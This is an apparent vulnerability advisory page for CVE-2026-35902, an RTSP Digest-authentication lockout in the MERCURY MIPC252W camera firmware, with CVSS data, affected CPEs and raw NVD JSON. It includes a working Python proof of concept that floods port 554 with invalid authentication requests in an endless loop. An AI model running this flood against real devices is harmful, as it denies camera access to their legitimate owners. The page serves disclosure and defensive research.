Security Vulnerability Report
CVE-2026-35902 CVSS 6.2 MEDIUM

Published: 2026-04-27 19:16:51
Last Modified: 2026-05-05 13:40:59

Description

The RTSP service of MERCURY IP camera MIPC252W 1.0.5 Build 230306 has an issue handling failed Digest authentication attempts. By repeatedly sending RTSP requests with invalid authentication parameters, an unauthenticated attacker can cause the RTSP service to enter a persistent authentication failure state, preventing legitimate clients from authenticating and leading to a denial of service.

CVSS Details

CVSS Score: 6.2
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:mercurycom:mipc252w_firmware:1.0.5:build_230306:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:mercurycom:mipc252w:-:*:*:*:*:*:*:* - NOT VULNERABLE
MERCURY IP camera MIPC252W 1.0.5 Build 230306

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket

# Target configuration
TARGET_IP = "192.168.1.100"
TARGET_PORT = 554

def send_malicious_rtsp():
    # Construct RTSP DESCRIBE request with invalid Digest Auth
    # This simulates an attacker sending bad credentials repeatedly
    payload = "DESCRIBE rtsp://{} RTSP/1.0\r\n".format(TARGET_IP)
    payload += "CSeq: 2\r\n"
    payload += "Authorization: Digest username=\"admin\", realm=\"IP Camera\", nonce=\"\", uri=\"\", response=\"invalid_hash_value\"\r\n"
    payload += "User-Agent: PoC-Client\r\n"
    payload += "\r\n"

    print("[+] Sending malicious RTSP packets to {}:{}...".format(TARGET_IP, TARGET_PORT))

    try:
        while True:
            # Create socket to send packets
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(3)
            s.connect((TARGET_IP, TARGET_PORT))
            s.send(payload.encode('utf-8'))
            # Close connection immediately to simulate rapid attempts
            s.close()
            print("[+] Packet sent. RTSP service should be unresponsive soon.")
    except KeyboardInterrupt:
        print("[-] Exploit stopped by user.")
    except Exception as e:
        print("[-] Error: {}".format(e))

if __name__ == "__main__":
    send_malicious_rtsp()

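References

https://github.com/izxnfirh8148/CVE_REQUESTS_references/blob/main/MERCURY_MIPC252W/MERCURY_MIPC252W_3th/README.md (Exploit, Third Party Advisory)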

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35902", "sourceIdentifier": "[email protected]", "published": "2026-04-27T19:16:51.060", "lastModified": "2026-05-05T13:40:59.077", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The RTSP service of MERCURY IP camera MIPC252W 1.0.5 Build 230306 has an issue handling failed Digest authentication attempts. By repeatedly sending RTSP requests with invalid authentication parameters, an unauthenticated attacker can cause the RTSP service to enter a persistent authentication failure state, preventing legitimate clients from authenticating and leading to a denial of service."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-307"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:mercurycom:mipc252w_firmware:1.0.5:build_230306:*:*:*:*:*:*", "matchCriteriaId": "61FE2E9E-C0F5-4F45-B4F4-10E05CEB0395"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:mercurycom:mipc252w:-:*:*:*:*:*:*:*", "matchCriteriaId": "5CBF3BC0-1845-4D38-BFD2-3B02219C1BD8"}]}]}], "references": [{"url": "https://github.com/izxnfirh8148/CVE_REQUESTS_references/blob/main/MERCURY_MIPC252W/MERCURY_MIPC252W_3th/README.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": 
"https://github.com/izxnfirh8148/CVE_REQUESTS_references/blob/main/MERCURY_MIPC252W/MERCURY_MIPC252W_3th/README.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}